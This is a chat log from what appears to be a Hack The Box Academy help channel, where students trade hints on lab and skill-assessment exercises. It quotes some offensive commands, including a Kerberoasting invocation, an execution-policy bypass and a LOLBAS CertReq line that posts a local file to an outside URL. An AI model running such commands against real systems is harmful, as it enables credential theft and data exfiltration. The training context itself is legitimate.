#modules

ye i was

its alright i leared openssl aslo )::

Footprintning yeah?

yea

road to CPTS (reaaaaly long distance)

Could also be an issue of timeout over that method

yea, do you have CPTS?

No

yea i challenged myself to do pen tester job path in 35 days

Speed isn't as important as understanding

yes i know i make notes on everything in notion

and before sleeping i go back

to look what i have done

Footprinting is t2 so deleting your messages bc they're spoiling content

Also curl -k worked for me

yea fine

yeap strange

@sage quest : If you still need some help, you can DM 🙂

Was able to complete with curl, not sure your issue. But seems connection related

Hey guys does anyone know how to find this awnser from hashcat password cracking? ****

if it is about getting into dev i need nudge too

I found a pasword in the ntds.dit file but the awnser is completely different and I don't understand how you get to there

You can DM if you still need a nudge.

You can use hashes to authenticate as a user in windows btw

you can dm me

sure thanks sir

Didn't know that but I don't have an ip i just have a responder.log file and a ntds.dit file

hello there! Hope to be in the right place. I just finished the "introduction to malware analysis" module and all the bin exploitation path. I'm quite prepared in reversing and binary exploitation (thx to pwn.college). I really would go deeper in malware analysis. Do you have any suggestions or resources? 🙏

hiii

Someone to study with?

Intro to Network Traffic Analysis

---- + 0 If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question. -----

its all the time Incorrect answer

Hello there, why cant i write messages on #general

I can't send messages in the General channel. It shows that I don't have permission

Follow the instructions in #welcome to gain access

Hey guys,
I'm stuck in the module "Pentest in a Nutshell" in the "Windows privilege escalation".

I cannot answer the question which type of privilege escalation was used.

Overall I did the whole escalation on my own. But I don't know how it is called. Even ChatGPT camnot help..

Please help, I'm already frustrated and want to finalize this last answer.

Thanks!!

Hello, I have an issue with module AD attacks section: Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux

I want to perform kerberoasting cross forest , but through a tunnel from my linux machine passing by the provided box. I used ligolo and set up local dns. but I get connection refused :
cmd: GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/forend

It works fine when I dont use tunnel and from the provided machine

thank you 🙂

you need to have all the domains in your own host; Kerberos doesn't like you not having the FQDN, DN, and such within your hosts file

I have both domains in hosts

Hi anybody that did sliver c2 module recently

Hey, I think there's an issue with the Module 3 practical lab ("Windows Event Logs & Finding Evil") in the SOC Analyst path. We're supposed to analyze event ID 4624, but it's missing from the Event Viewer on the RDP machine—even after applying the filter. I’ve attached a screenshot as proof.

someone can help me?

there should be a domain controller to connect to no?

Hi everyone , i need help with T.E T.E http attacks

Hello there

Why can't I talk in general?

@edgy juniper can you tell me

#welcome holds all the answers

hello, could I dm someone about the second skill assessment in the nosql injection module?

Hi everyone , i need help with T.E T.E http attacks
anyone please

hi

I'm doing the Intro to Academy's Purple Modules module and I'm exploiting CVE-2024-22120, in the question Exploit the CVE-2024-22120 vulnerability on the spawned target and enter the content of the root.txt file located at the /root directory as in your answer. but for some reason it doesn't work for me in any way. Can anyone give me more details?

???

Hello folks

I'm trying to exploit that CVE but I have no results and it gives me an error.

On “INTRO TO WINDOWS EVASION - DYNAMIC ANALYSIS”

I’m getting a GPO error . When trying to get a reverse shell

May I assume that expected , assuming the scan flagged it ? I don’t think so

I’m not admin to disable GPOs on target . Any nudges please ? 99.99% sure my super shell via Micro shell is good to go 🙂

I'm so lost on the linux priv esc skill assessment, i cant get flag4. Can i get a nudge?

This does not look like a scanning issue.

What Am I missing here? 🙂

Hi! I’m working on an HTB module that says:

"Aside from blogs related to retired HTB boxes, it is also worth seeking out blog write-ups on recent exploits/attacks, Active Directory exploitation techniques, CTF event write-ups, and bug bounty report write-ups."
I’d love to know, what are your favorite websites covering these topics?

Set-ExecutionPolicy Bypass -Scope Process

Iirc

Yeah I tried that

No success . Let me try later at home . Leaving work 👍

Pivoting, Tunneling, and Port Forwarding

Skill Assesment:

does anyone have reliable way of performing nmap scans of remote hosts

i sometimes get that the host is up, sometimes not
but ALWAYS no matter what i try, the ports (3389 specifically but others too) are always filtered

the earlier sections touched briefly upon that but it doesnt work...

Host is up.

PORT     STATE    SERVICE       VERSION
3389/tcp filtered ms-wbt-server

i can connect to the port but i cant perform general nmap scans

sudo

tried

if you sure that the host is up , add -Pn flag to skip host discovery

if you get filtered through pivoting, and your using ligolo check your routes, if you're using port forwarding check your socks proxy

I tried these:
Metasploit
Shuttle
Chisel (libraries got fucked)
And couple more

Haven't tried that one

The thing is I can interact with the port

When I do my routing properly

But I can't ping nor nmap scan it

you cant ping because often the target unreachable windows host blocks icmp packets

what command you used?

ping💀

i guess its that

Im stuck on a module, I have found the flag but it won't take it.
Module link: https://academy.hackthebox.com/module/19/section/108
Page name: Nmap scripting engine (NSE)
The question is "Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer."
I have tried nmap -sV <ip address> -sC' and indeed in one of the services I get the flag HTB{code}, I copy it and it doesn't work, Ive also tried putting in only the code inside the parentethis but nothing

check for spaces

in the field for the flag

no spaces

I read this yesterday when I was tired and now re-reading it now makes so much sense

am trying to setup a nfs server on my mv but it get error while mounting the directory

sudo mount -t nfs 192.168.204.48:/home/kali ./target-NFS/ -o nolock               32 ↵

mount.nfs: access denied by server while mounting 192.168.204.48:/home/kali
╭─kali@kali ~ 
╰─$ cat /etc/exports                                                                  32 ↵
# /etc/exports: the access control list for filesystems which may be exported
#        to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/kali  10.129.14.0/24(sync,rw,no_subtree_check)
╭─kali@kali ~ 
╰─$ showmount -e 192.168.204.48                                        
Export list for 192.168.204.48:
/home/kali 10.129.14.0/24

Anyone know how to deal with incredibly unstable RDP connections on academy? I'm trying to finish off the footprinting modules, but the final challenges have RDP machines that crash on me within a minute of accessing them. I've tried multiple different connection tools, my own VPNd machine, the parrot box HTB gives you, but it clearly seems to be a server side issue. I have to reset their box for it to work again, and even when I reset it, the RDP machine works for maybe 30 seconds and becomes inaccessible after it inevitably crashes.

Hello, can someone help me with the AD trusts attacks skill assessment ? I am getting error KDC_ERR_PADATA_TYPE_NOSUPP but have no idea where the issue is.

would anyone who finished the linux priv esc module be willing to help me out on the skill assessmen?

Can I reset all progress on my HTB account without deleting it?

have you tried to download a diffent vpn file that has a better connection?

You can’t

If you are still stuck you can DM.

Well darn

hi, i'd appreciate some advice on Password Attacks Lab-hard. i'm trying to move the Backup.vhd. i notice it does not work with smbclient due too being too large. i have attempted to move it with ||smbserver.py|| it just hangs... it will show the file on my attacker machine, but when i try to convert it to a hash to crack it says its missing its signature. i have also tried to move it with xfreerdp || /drive:starr,/home/kali/xxxxx/xxxxx || i open powershell as david and || move Backup.vhd \tsclient\starr || and it just hangs.

I think I've seen this before with time synchronization as the root cause - can you sync your time with the DC? (Eg with ntpupdate)

I'm stuck on the android security question

Which Signature Scheme versions are vulnerable to CVE-2017-13156? (Format: 3 words)

anyone have any idea how they want the answer to be formatted. I've tried quite a few different ways

Dm me if you still need help

It's at the top of the page.

Try changing the MTU on the VPN connection and switching to the TCP option, others have had success with this.

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn#h_ccf26ec237

Read the file.

Could any1 pls guide me on some of the Linux fundamentals bit where I have to find the student home directory I've found the answer in a forum but I don't want to use the answer without understanding how u get to it

I'd probably read back over the relevant module and section, and try to come to that understanding yourself

in the case anyone else is around that can help me with this issue, i took a few screenshots. i created a text file and i could copy it over to my kali just fine, but when i tried to do the same with the Backup.vhd file, it just hangs.

Don't just search for answers, it doesn't help you learn at all @deep pier

That said, as it is a Tier 0 module, you can just flat out ask your question here @deep pier

Just know that for module above Tier 0, posting direct questions like that is not permitted.

24 hours later still trying to figure out the foothold...

In Shells & Payloads -> The Live Engagement there is this question

I did a quick search and found that there is a ||stageless payload that utilizes an exploit through a PUT request that seems harmless due to the payload being base64 encoded.|| However I'm realizing that I have yet to figure out how you're expected to find the credentials for the server configuration panel.

Enumerate your foothold a little bit.

Well, I have. I've tried finding ||hidden directories that may show a webpage or somewhere in the html that may feature a lingering comment with credentials|| and all I was able to find was the username. I'm not sure what I'm missing here

Look at what is on the desktop

🤦‍♂️ Thank you

try a different transfer method then

I tried smbserver.py as well. Does the same thing, hangs and gives me a partial file.

try using the tcp vpn -> setting it up again

I use tcp VPN. Perhaps I’ll try downloading a new VPN file.

I have tried but it's a lot harder since I'm a beginner

I'm also confused with how the SSH works

good god is there any reason why the foothold is so slow???

Has anyone finished the Skills Assessment 2 in the "Introduction to Windows Evasion Techniques" module? My file passes the checks but I can't get a shell to get the flag.

Hey, I just began the intro to linux module (newbie here). I'm on the question asking for the kernel release that is installed on the system in the VM. I've used the uname -r command and the output isn't being accepted as an answer. I've navigated to different files that could have this infomation, but it's all the same. Anyone have any idea?

I just tested this, it worked for me. Take note of the question, it says the format (just the numbers)

Yeah that's the format I used. Here's what is output: 6.11+parrot-amd64

Looks like you're doing it on the pwnbox instead of the target

or maybe your own VM

You need to SSH into the spawned target then use the command

Ah gotcha. I'll give it a go

Yeah once logged in via ssh it still outputs the same. How do I get into the spawned target?

Are you using the built-in pwnbox or your own virtual machine on the vpn?

doubt your ssh into the right thing

spawn instance != spawn target

they are completely different things

instance == pwnbox == in browser vm

target == victim vm == the thing you're connecting to for the exercise

does anyone remember the name of browser extension that redacted the module answers or even question? i wanted to redo few modules

it's not officially from HTB so be cautious, but it's here https://github.com/sudoheader/htb-academy-answer-hider

thanks

Login Brute Forcing
Skills Assessment Part 1
https://academy.hackthebox.com/module/57/section/515
I think you are supposed to try the basic-auth-user from the text, but I use the rockyou wordlist and the thing loads forever

Sql injection fundementals skills assessment
I cant find a directory where i can write a webshell file
Can i get a nudge

i'm currently running into this issue

I ssh in, after a short while the ssh freezes, machine doesn't respond to pings

it's worth noting the machine itself seems very, very slow

i'm wondering if it's running out of ram, maybe

nevermind, think I worked it out 😄

i'm just going to leave this section until someone can get back to me on this. can someone try reproducing the problem themselves, see if they run into the same issue? link to the section is here https://academy.hackthebox.com/module/24/section/514

actually im still stuck, casting it to a string dont even work ? 😄

@winged steeple dm me

show me what you got 🙂

If i remember theres a file, or if you dont know what thr target is running, "files" that show the webroot.

And using sql you had to read contents of the file

It also provided passwords.txt you tried using that first?

i didnt notice that, is it from the text?

Yeah also be sure to read the skills assessment closely or the questions, I always either wasted much time either cause I missed something or misread it.

Why suscribe as gold or platinum monthly does not include tier 3 modules?

the monthly plans will just give you cubes

so you can access any module with them if you have enough cubes

messaged you

only student sub gives access to all modules up to tier 2

how to get the http service and api attacks module free?

I've got a question I've managed to work out how to ssh into the machine and it's saying the authenticity of host can't be established this is hack the box which is my first time doing it

Should I continue or press no?

press yes

everytime you need to ssh to new machine you always need to do this

earn cubes

bro

i cant all module i can have its i pay 10 cube for get 10 cube

participate in the season, get cubes free

or giveaways

where pleae

...

this isnt a live chat support

just say me

be patient

ok

i open a live chat support

https://help.hackthebox.com/en/articles/7041927-introduction-to-htb-seasons

ok thx

Here. Next time, be patient and wait a bit longer than 10 seconds to write ...

Ok tysm

Why is it saying that SSH connection is closed by port 22 and how do I fix it?

It means default port for ssh is closed

maybe it opens on other port

you can try to do port scanning to find the open port for ssh

But I've tried to SSH into the Linux fundamentals machine using the ip address provided is there anyway around it?

can you show me the question? to make sure I am guiding you correctly

Ok

I can't send pics here so ill js dm u if that's fine with u

@novel shoal

Jokky?

It seems like you need to ssh to machine first

try to ssh to machine again

if the port 22 is still closed you need to do port scanning to find the open ssh port

Ok thx

i'm stuck at -SQLMAP ESSENTIALS->skill assesment i searched the entire web app i found a request with json data and tested it it does not seem that it have some bypasses , it found a sqli but does not give me any data retrieved ,and this is the only form that gives me params so i can test it in sqlmap , can someon guide me on it

Have you try to use with temper?

the request don't have any data to use with tamper

I got the flag by using simple sqlmap command nothing unique

can i dm you with the request ?

yes

hey guys im doing soc analyst prerequisites and doing web requests module and i dont understand this error i did the same commands earlier

oh wait nvm i figure it out

nvm i still didnt figure it out

Any clue on this?
Thanks!!

ok turned out i didnt add /api.php on the link i put in so the command misunderstood the argument that i meant to put in

silly me

This module page is written... in a very unclear way for a beginner.

https://academy.hackthebox.com/module/143/section/1485

1. Where does the author get the username "damundsen" from? I understand that the username corresponds to the user "Dana Amundsen," but how was the "damundsen" username obtained through PowerShell/PowerView? The author just mentions it in the explanation, but it's not shown anywhere in the command output, so it's impossible to logically follow the thought process.

2. How exactly do you “switch to the wley user”? It says “set the wley user as our starting node,” but how do you actually do that?

I'm going through this as part of CPTS prep. It's clear that you already need to know how to use BloodHound and understand Active Directory in order to follow this module...

This is my screenshot. Here I’ve selected the user WLEY. Where is the "Outbound Control Rights" block? I only see "INBOUND CONTROL RIGHTS". Does that mean I’m searching incorrectly?

which module and section is this

Active Directory Enumeration & Attacks > ACL Enumeration

Hello! Im stuck on the question What version of the SMB server is running on the target system? Submit the entire banner as the answer. of the SMB part of the module footprinting

I have tried everything to grab the banner

but htb does not give me right answer

As far as the usernames go, have you seen the wley user's full name somewhere before in the example? If you have, it's reasonable to assume you can turn Dana's name into her username. If not, I'm not sure.

I'm stuck in LFI php filter part Question I run the fuzzing command correctly but the out is the all word list in the word list, it's not export me only the valid one, anyone can help me on this?

I have tried nmap multiple ways, rpc enumeration, enum4linux, enum4linux-ng and so on

nmap -sC -sV

nmap --script banner

Hi eeryone I need help with TE TE http attacks, will anyone help me please

no luck so far

also used smbclient

That's the question, how "Dana Amundsen" turns into the username "damundsen"?

assuming you have knowledge of how usernames are generated within the environment you're testing (first initial + last name)

What you've done already should have given you the answer. Are you allowed to post the answer you're trying in this chat? I'm not sure on the rules.

oh god I have tried many

can I send them to you in dm?

Yeah

it's not obvious at all.. and how to get the username using PowerView?

ConvertFrom-SID $sid

you can DM if you want, I have done that module

or in the future

i believe you got an idea of how the usernames are generated based on the initial domain enumeration + password spraying

ufff... nice!

Until the current section there were no particular difficulties)

would be worth clarifying though how they got damundsen

and the second question. how to display the shown graph in BloodHound? the "OUTBOUND CONTROL RIGHTS" block is not displayed when selecting "WLEY@INLANEFREIGHT.LOCAL" as the initial object

under OUTBOUND OBJECT CONTROL, try clicking Transitive Object Control

hey i have problem on Footprinting - DNS module
i can't anser the last task

ah, i believe if you click First Degree Object Control under OUTBOUND OBJECT CONTROL, you should get the same graph

idk why it's not named OUTBOUND CONTROL RIGHTS. might be a different BloodHound version

i'll have to delete this though since it's revealing Tier II module content

if you can, remove the attachments from this message as well

you are absolutely right, yes.. everything was displayed when I clicked, as you said. I apparently have a newer version of BloodHound

after your tip I checked it on BloodHound GUI in Windows host, everything is correct!

Thanks!

Broken Authentication
Enumerating Users
https://academy.hackthebox.com/module/80/section/772
I can't seem to get the ffuf right. It just load for forever.

Hi I am new

I have a base Debian machine with my Obisdian notes. I also have a Windows VM with a Powershell session. Is it possible to copy command line output from my powershell session into my Obsidian notes? I cannot get the copy-paste to work with my Windows VM. I have no problems when I'm running a Parrot VM copying to and pasting between my host and VM.

depending on the vm there should be a copy/paste to/from host/guest

virtualbox calls it bilateral copy/paste

Ah, I'm using virt-manager, so I don't see that anywhere. It just works seamlessly with a Linux VM.... but with a Windows VM, nope.

@midnight sinew That module is above tier 0 please refrain from posting specifics about it, such as exploits or techniques

I didn't use proxychains, I used ligolo-ng for this fwiw

Ty but where am i supposed to ask ? (next time)

You can ask here, just don't reveal specifics

I am trying to double pivot: fine
I'm trying to access <machine name> from <machine name 2> to be able to use <specific exploit>: not fine

Any hints

I try the many dns worldlists but still not find the subdomain

Fierce wordlists help. Also subdomains of subdomains

This has been asked and answered a dozen times at least lol

If anyone has some tips it would be helpfull

@west arrow module is above t0 please don't spoil stuff for skill assessments :)

You can still dm me bro

I got some hints, thanks anyway

Sorry what does that mean

it means you revealed something about the skill assessment that other people could use to bypass doing it themselves and learning

also t0 == tier of the module; tier 0-4

yo guys for participating in CTFs is it better to follow the bug bounty hunter path or the pentester path

tier 0 are "free" modules

bug bounty path; pentester path focuses more on actually rooting an underlying system. CTFs rarely go past the vulnerabilty exploit aside from maybe pwn challenges

why could it be that i could find the flag in the "Firewall and IDS/IPS Evasion - Hard Lab" on the academy PWN box but not on my VM?

Windows Privilege Escalation - Skills assessment 1:
My Kali works fine normally, everything worked fine during the other modules, but working on the skills assessment, after getting a shell and while enumerating my session just hangs. Like totally, so I have to just shut the VM down and restart it. It's so odd. Never experienced this before and it's so weird. I have noticed a lot of latency while running commands on the target. But even though the target might be slow it shouldn't like completely freeze my attacking VM..? Anyone have experienced anything similar?

Ive been doing a nmap and it said it would take 1h, then used the modules PWN box and it did in in less than half a minute @full wagon

Could be vpn servers overloaded or something

Or use the web VM if your using your own

yeah, don't like using the pwnbox, but might have to give it a try for this part 👍

Footprinting
Medium Lab

I've got into the Windows user and found sa credentials for MSSQL, but keep getting generic error messages when trying to use them to log into SSMS (persisted after resetting target box), am I on the complete wrong track?

Your vm was running dns on 53

Pwnbox also utilizes the vpn servers, so this wouldn't track with your reasoning

Mssql supports several authentication methods

Hey

I. am stuck footprinting DNS

I advised you earlier with this

Don't reveal content: module is above t0

Sorry I didn't see it

Where ?

dig axfr the base domain; sub.sub.domain.htb

.

Ok I get it

I think about it before

I used to be afraid of wasting my time if I did it

The base dig might find something the auto tool doesn't

Is it ok if I use the pwnbox to do portswigger labs ?

yo guys

im on living off the land section

of file transfers

im trying to use certreq.exe for uploading a file to my linux

heres the command im using

txt```

and im getting this error

anybody has an idea

Are there any cloud modules ?

heres the syntax from LOLBAS

    Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.

    CertReq -Post -config https://www.example.org/file.ext C:\Windows\Temp\file.ext

    Use case
        Upload

    Privileges required
        User

    Operating systems
        Windows 10, Windows 11

    ATT&CK® technique
        T1105: Ingress Tool Transfer

I know there are business professional services for cloud, but any for us regular not business ppl

Prompt Injection Attacks --> Skills Assessment --> Assistant:(Alice), I'm happy to inform you that your account has been successfully banned .

where can i get the flag?

THM has far better support ngl

Found the flag in HTB format but it does not work.

Make sure there's no spaces

checked this. Its all whithout spaces

Anyone who can help with XSS Filter Bypasses in the Advanced XSS and CSRF Exploitation module?

Indeed, I had to kill dnsmasq, thank you

Any is a deprecated functionality; but maybe look somewhere else

Also you still have the subdomain in your pasted result

hey everyone I'm working through Password Attacks/Protected files. The lab is to brute force the password of Notes.zip. I have created my hash file and tried to run John and hashcat against it but its finishing very quickly with zero results even though I've made sure the hash file is in correct format. anyone have a hint for this?

The main point of digging the base domain is to get the list of all potential subdomains to sniff in: maybe look for stuff you didn't access before

Are you using the mutated wordlist?

yeah I'm using a mutated wordlist I created a few sections back but its as if its not running because its finishing in a couple seconds

John and hashcat can finish rockyou in seconds depending on the hah type

Mutated list is tiny in comparison

eh I dont think my pc is that good lol

Did you mutate correctly?

Looks like you’re running a list mutated for kira

Yep, its mutated correctly. This lab question has to do with user Kira, so it makes sense to try against her mutated password list first rather than use rockyou.

Use the larger list

Just in case

Its worth a shot to do the whole list

Never make full assumptions

It will take 1 second

I posted the results using the larger list here

You are assuming it's correct; but not checking other possibilities

No; that's rockyou

oh i understand now, my larger mut pass list

Larger list == the full mutated list, not the clipped version "for kira"

Hello i had a question about a challenge called SideClimbers

Thanks for the tips TLattice and ML, I see I should've been more thorough tryying the wordlists first. felt like I was doing something wrong because it was finishing so quickly

Is there any way I can access the pwnbox besides constantly waiting for 1

Wrong channel: read and follow #welcome to access #challenges

No I don't think .. + they blocked me on discord ( I did a little think I don't remember but it not worst to be blocked)

https://academy.hackthebox.com/module/80/section/767
Broken Authentication
Brute-Forcing Password Reset Tokens
I can't find answer to the first and last questions to the module

DNS has always been designed to use both UDP and TCP port 53 from the start, with UDP being the default, and falls back to using TCP when it cannot communicate on UDP, typically when the packet size is too large to push through in a single UDP packet.

cant the UDP packet be split into multiple?

if that data is 1500 bytes and every UDP packet can hold 512 bytes, then it could be split into 3 packets, no?

DMd you

I'm on the Web Server Pivoting with Rpivot section, Question: Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer. I've set everything up but I can't seem to load the internal page using proxychains firefox-esr 172.16.5.129:80. However, I can see the raw output of the default Apache website if i run command : curl --socks4 127.0.0.1:9050 172.16.5.129:80. But where is the flag????

UDP can't guarantee they'll land in order

help me plz in android fundamentals Find the UID of the application com.android.settings. Use the command adb shell ls -l /full/path/ to inspect the file permissions and identify the application's UID from the output. i found the uid but its wrong why&

try just proxychains firefox and then load onto the site using the ip

your errors are network related, i would go over all the configurations and settings again and make sure they're accurate

can you try proxychains curl ? I have a suspicion its your proxychains conf

also those are from the mozilla servers

All right, this Intro to Assembly Language Skills Assessment is killing me. I finally got the first task done after struggling, but now I'm stuck on task 2. This stupid flag.s file is driving me insane lol. Any helpful tips?

try socks4 127.0.0.1 9050

This doesn't tell me much of anything. The error is clear, timeout means your packets are timing out before reaching the target. That tells me you have a misconfiguration somewhere. You should comb through each and every aspect to ensure it's setup correctly. VPN/Pwnbox, target, the proxy config, ports, etc. When asking for help here it also helps immensely if you say which module and section you're on.

changed to socks4 now i see page in browser! How will i know when to use socks4 or socks5?

been using socks5 up to this point

https://tenor.com/view/thats-the-neat-part-you-dont-invincible-gif-27194608

typically though; if the port is 9050: socks4 -- 1080: socks5

gotcha

you'll generally know if A doesn't work try B; or just avoid the issue if possible by using ligolo-ng instead

Haha yes. I was being silly and skipped the step where I ssh into the target. I just started on the instance spawn.

We're good now!

finished an 8 hour module in 4 study days

https://tenor.com/view/ronaldo-award-walking-meme-ceremony-gif-3879624934865009419

https://tenor.com/view/druski-druski-dance-druski-dance-crowd-dancing-dancing-druski-gif-2185282876393342539

Sign the application myapp.apk and install it by either dragging and dropping it onto the device or using ADB. Make sure to first uninstall any previous versions of the app. After installation, tap on the app to start it. What is the message printed on the screen? how to sign the apk&

Yeah that one was rough.

It really is! I'm still trying to finish it. Any suggestions?

Yeah I modified the starter code to decrypt the chunks of the shellcode that were encrypted (xor), then put them into the registers like normal, grab them from memory and then run the shellcode on the target

Probably not the most elegant approach- like print debugging In assembly, but it worked

I see. So you ran it line by line and just cleaned it all up to get the correct shellcode? I've tried quite a few shellcodes and keep getting the Failed to run shellcode! error. It's so frustrating lol

Yeah I just dumped an xor(string,key) command in there before each value was written to memory.

One of the values has an issue you have to tweak to make sure the shellcode is valid. Run through the valid shellcode checklist from the module

Okay, thank you. I'm going to see what I can do. Just had to reset the whole thing, it was making me so mad lol.

👍

https://academy.hackthebox.com/module/134/section/1178
Bypassing Security Filters
Web Attacks
have send a command by URL. Can't seem to get flag out of it.

Hi

Module: Windows Privilege Escalation
Section: Citrix Break Out
Section Link: https://academy.hackthebox.com/module/67/section/2502

I have got the flag in pmorgan's Downloads. To escalate privilege, I wanted to execute the powershell scripts. I could not find those scripts in the server. I am not sure how to transfer these scripts to the Windows machine. Can anyone help?

Use some of the methods mentioned in the section or from the File Transfers module

Module {XSS}
Session hijacking
When trying to exploit blind xss on target (gets below error instead of cookies)

[Thu Apr 10 00:15:58 2025] redacted: Accepted
[Thu Apr 10 00:15:58 2025] redacted:[200]: GET /script.js
[Thu Apr 10 00:15:58 2025] redacted: Closing
[Thu Apr 10 00:15:58 2025] redacted: Accepted
[Thu Apr 10 00:15:58 2025] redacted: Closed without sending a request; it was probably just an unused speculative preconnection
[Thu Apr 10 00:15:58 2025] redacted: Closing
Any solution to fix this?

How do i hack any server

you don't

anyone else get this error in the skill assessment of crackmapexec module?

Try with the alternative - netexec, and see if you get that error

yeah i also try with netexec

i alredy upgrade cme

helloo + 1 After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.
i use this command to nslookup -type=NS inlanefreight.htb
search for query but i dont get anything what do i do

DNS records != type=NS

when you specify -type=NS you're only going to get records that are labeled as => NS

try reinstalling nxc

and impacket

forget about it, i try netexec whit sudo privileges and it worked hehe

yeah

should i use axfr?

no axfr wouldnt work

hmm

yes, it would

don't rule things out unless you've already tried them

okay i did it thanks

can someone help me with this please ; )

is your script.js pointing to the right thing?

not good with js. so should i send the script.js content here? coz idk if its spoiler or no ;v

but it think its pointing right

it's a spoiler, so no

it should point back to your own ip:port/index.php or whatever they had you make

yea its as u said

its making the get request for script.js then this > Closed without sending a request; it was probably just an unused speculative preconnection

its been 3 hours i m stuck on this

got it (i missed single quotes somehow even after copying the script content)

i did it 🎉

Prompt Injection Attacks --> Skills Assessment --> CEO is banned, HackBot confirming this and gives an incorrect flag (HTB format). What now? Tried accessing admin panel as HackBot instructed but that still gives me an error: 'Access denied. Please provide in admin key in the GET-parameter "key".'

Tried several ways to send the admin key with GET parameters but none were taken.

Anyone any suggestions? HTB instructions are met but not sufficient enough to pass the test.

I am working on SA HTTPs/TLS Attacks but with padbuster I get 'Double check the Block Size and try again.' when I try to test padding vulnerability. I used the hash in the user cookie two times just as in the module is written and size 16 -encoding 1. Tried also difference sizes like 4, 8, 32. Nothing works. tested on endpoint /token and /admin. Can someone help me with this?

If anyone is able to confirm this for me just so I understand this concept... (relating to MSF)

Say we utilize some exploit to get a foothold on a system via reverse_tcp. However we're stuck with low permissions. We enumerate with our newfound position and find an outdated tool that has a known exploit that can help elevate our privileges. We background this task.

We then select this particular module, then set the session to the prior background session. If we were to perform the exploit now, is the payload carried through our initial foothold? Or is it not working in that particular way (not necessarily mounted on but rather parallel, or does it vary?)

Anyone able to dm me for hints regarding NTLM relay attacks - skills assessment Question 4 ?

you can DM me

@ember lake

1. That's illegal
2. Against server rules to solicit illegal activities

depending on the privilege escalation module it will create a new session or upgrade your current session account to gain additional privileges

ok that makes sense thank you for clarifying !

can someone help, i’ve connected the openvpn but can’t ping the destination

Hi everyone I'm solving Linux Fundamentals currently and I'm stuck on Working With Web Services part....can u guys suggest a solution for this question: Find a way to start a simple HTTP server inside Pwnbox or your local VM using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number).

Is the intro to binary reversing the only module that works on reversing?

Anyone any tips for finishing skills assessment in prompt engineering attack? CEO banned, now i apparently need an summery, but I dont know where to get it.

does anyone here use athena OS?

can’t seem to download braa on it

http-server , use man pages?

Attacking AD and NTDS.dit

Got one set of creds from brute-forcing usernames and pw's - doesn't let me connect with winrm? Is this normal? Please @ with any responses, thanks!

Ok I'll try this one...

See if you can use what you got to answer Q3 and use it with what is covered in the Farming Hashes section.

Chur

hello , I'm stuck in Introduction to Digital Forensics Skills Assessment , can anyone help

Hi anyone know why I keep getting this error while attempting the second RDP in "RDP and SOCKS Tunneling with SocksOverRDP
" of "Pivoting, Tunneling, and Port Forwarding " module

Prompt Injection Attacks --> skills assessment --> banned the CEO but apparently i have to get a summary from somewhere. Any one any directions since HTB does not tell anything about this part?

can anyone help with file transfer module + 2 Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.
this one

i did it hehe

nope still there

same problem

Pls DM me with what exactly you tried (if possible with the exact prompts and screenshots), and I'm gonna look into it

In the Sliver C2 module, does enyone get the rpc error: code = Unknown desc = implant timeout when trying to upload beacons or other large files to a target machine? I have tried big timeout options but still it fails. Session is also alive and does not die during the upload.

if you need help you can dm me

In attacking thick client applications. When looking at the memory map. How do we know which rows would contain sensitive information? The module chooses that specific row because it says it has read write protection set but i see that many other rows have the same protections so is it trial and error or is the something more to it?

Hey guys, I working in the module "Kerberoasting - from Linux" but I can't find the way the get the password

Can anyone tell me that which linux distro is best for beginners who is shifting from windows to linux

i need help with ctf event everything allowed (mainly steganography)\

Hi guys, can anyone help me with this question from Password Attacks module. Here is the question: Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. I have found the flag, but it keeps giving me an error. i have found and download julio.txt file, but it says that the answer in wrong. Thank you in advance

Hey guys, is there someone can help with "XSS Filter Bypasses" in the Advanced CSRF and XSS module?

Hey all, just finished the remote port forwarding chapter in the Pivoting, Tunneling, and Port Forwarding module. The chapter explains steps to get a reverse shell through a pivot host to a host on the internal network, but the questions don't seem to relate to this at all. I tried to replicate the steps for practice and I was unable to, is this intended or have I probably messed up somewhere? Thanks!

"dont seem to relate" in the sense that they don't ask you to perform what it teaches...

If anyone could help me figure out in the shells and payloads module in the live engagement section how we know there is Java on the Apache tomcat sever and how to know which exploit to choose

They blocked me too, very wired minds there

But they respond to questions almost immediately

hey ya'll if im running hydra against a machines ssh service. Can I also run hydra against the same machines ftp service, or should you only attack one service at a time?

(Not sure if this belongs in this channel, lmk if I should delete)

Hello, I am on Introduction to Active Directory module.
I am stuck on AD Administration: Guided Lab Part I, When I am trying to RDP into machine, I am not able to login, but it does not load properly.
I tried revoking old VPN keys and changed my internet connection, still did not work. Please refer to the attached screenshot for reference. Any nudge would be helpful.

Same issue occur Pwnbox as well.

have you tried pressing enter a couple of times on the black screen?

hello i am doing metalspoloit module and do i need to download another vpn file or it should be the same cuz i cant ping the host

and openvpn command fails sometimes

You should be able to use the same Academy VPN file for all modules. Not all hosts respond to ICMP requests. Maybe try something like nmap -Pn?

Hello I can't connect to this can someone help me please ??

yea i went for the next module ill do it later

generally one service at a time

username incorrect

you're using htb_student, the username is htb-student

ohhh bruh yeah sure...

also, deducting points for using powershell in linux

I totally make this mistake too often to admit

idk what to use

bash/terminal

the ||$_|| icon in the menu bar

also you can fullscreen btw

I cant find it

yea its the same for next module 😄 😄 😄 i cant ping but i can nmap that great finding

literally just told you how

@mellow turret this isn't a hacker4hire server, read the #rules

and #welcome

@fathom pendant Host is up (3.1s latency).
All 1000 scanned ports on 10.129.237.17 are in ignored states.
Not shown: 922 filtered tcp ports (no-response), 78 filtered tcp ports (host-unreach)
